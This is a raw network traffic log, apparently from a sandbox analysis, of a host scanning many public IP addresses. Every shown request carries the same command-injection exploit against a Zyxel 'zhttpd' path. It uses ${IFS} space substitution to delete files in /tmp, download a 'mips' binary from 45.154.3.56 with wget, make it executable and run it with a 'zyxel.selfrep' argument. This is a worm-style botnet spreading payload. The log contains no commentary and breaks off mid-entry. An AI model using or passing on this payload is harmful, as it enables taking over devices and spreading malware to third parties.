                        Session IDSource IPSource PortDestination IPDestination Port
                        2896192.168.2.1449164123.129.75.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208106041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2897192.168.2.144468838.67.29.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208149910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2898192.168.2.144153242.52.47.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208215952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2899192.168.2.1448512138.129.191.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208245993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2900192.168.2.145002081.111.51.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208291054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2901192.168.2.1448250165.108.44.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208327055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2902192.168.2.1448446136.203.147.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208378077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2903192.168.2.144850224.149.15.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208399057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2904192.168.2.1444864108.161.142.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208451986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2905192.168.2.1452250183.134.221.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208484888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2906192.168.2.1457682184.106.193.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208534956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2907192.168.2.1447410145.101.255.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208585978 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2908192.168.2.1439756155.138.108.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208626032 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2909192.168.2.1455474102.68.102.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208678961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2910192.168.2.1456178135.58.204.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208726883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2911192.168.2.1446226102.217.252.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208760023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2912192.168.2.144296090.97.82.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208791971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2913192.168.2.1453570144.102.4.195443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208846092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2914192.168.2.1442100107.110.24.241443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208882093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2915192.168.2.143680667.222.92.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208911896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2916192.168.2.144756854.246.50.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.208976984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2917192.168.2.143999448.79.34.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209021091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2918192.168.2.143379039.133.24.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209074974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2919192.168.2.144612646.111.172.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209111929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2920192.168.2.1446960207.254.237.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209148884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2921192.168.2.1442760189.134.161.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209151030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2922192.168.2.1453778107.176.109.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209218979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2923192.168.2.1438734223.225.2.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209253073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2924192.168.2.144669681.141.206.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209300995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2925192.168.2.1436720187.103.162.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209342003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2926192.168.2.1451038141.200.156.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209372997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2927192.168.2.145468674.37.27.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209410906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2928192.168.2.146051024.75.36.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209450960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2929192.168.2.143958025.249.38.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209492922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2930192.168.2.143894039.171.204.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209547997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2931192.168.2.143664869.242.107.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209592104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2932192.168.2.144562212.15.136.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209638119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2933192.168.2.143760486.232.23.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209666014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2934192.168.2.1448770150.151.93.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209703922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2935192.168.2.1444346222.168.241.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209753036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2936192.168.2.143759665.107.123.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209815025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2937192.168.2.1438508217.81.109.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209850073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2938192.168.2.1435940212.238.18.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209892035 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2939192.168.2.1441182211.36.252.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209914923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2940192.168.2.145620493.79.217.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209945917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2941192.168.2.1445916104.60.85.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.209976912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2942192.168.2.143561878.54.25.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210072994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2943192.168.2.1441838193.143.48.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210094929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2944192.168.2.145795866.88.21.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210153103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2945192.168.2.143990834.70.123.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210190058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2946192.168.2.144123079.61.170.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210235119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2947192.168.2.1434600136.149.206.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210294008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2948192.168.2.1448214181.27.183.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210340023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2949192.168.2.1453048115.92.11.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210387945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2950192.168.2.1454996177.13.95.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210423946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2951192.168.2.1435806143.112.183.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210460901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2952192.168.2.1442668208.123.222.130443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210486889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2953192.168.2.1458528158.1.57.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210557938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2954192.168.2.1453972107.3.147.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210613012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2955192.168.2.145566052.46.157.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210644007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2956192.168.2.1441700162.164.48.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210668087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2957192.168.2.1441786164.6.55.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210716009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2958192.168.2.1446974190.190.32.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210757971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2959192.168.2.1441070198.33.13.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210773945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2960192.168.2.1455264170.106.52.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210805893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2961192.168.2.1438674133.208.246.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210844994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2962192.168.2.143935859.169.112.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210877895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2963192.168.2.144811681.151.149.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210921049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2964192.168.2.1454612128.25.17.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.210951090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2965192.168.2.1456610154.83.118.199443
                        TimestampBytes transferredDirectionData
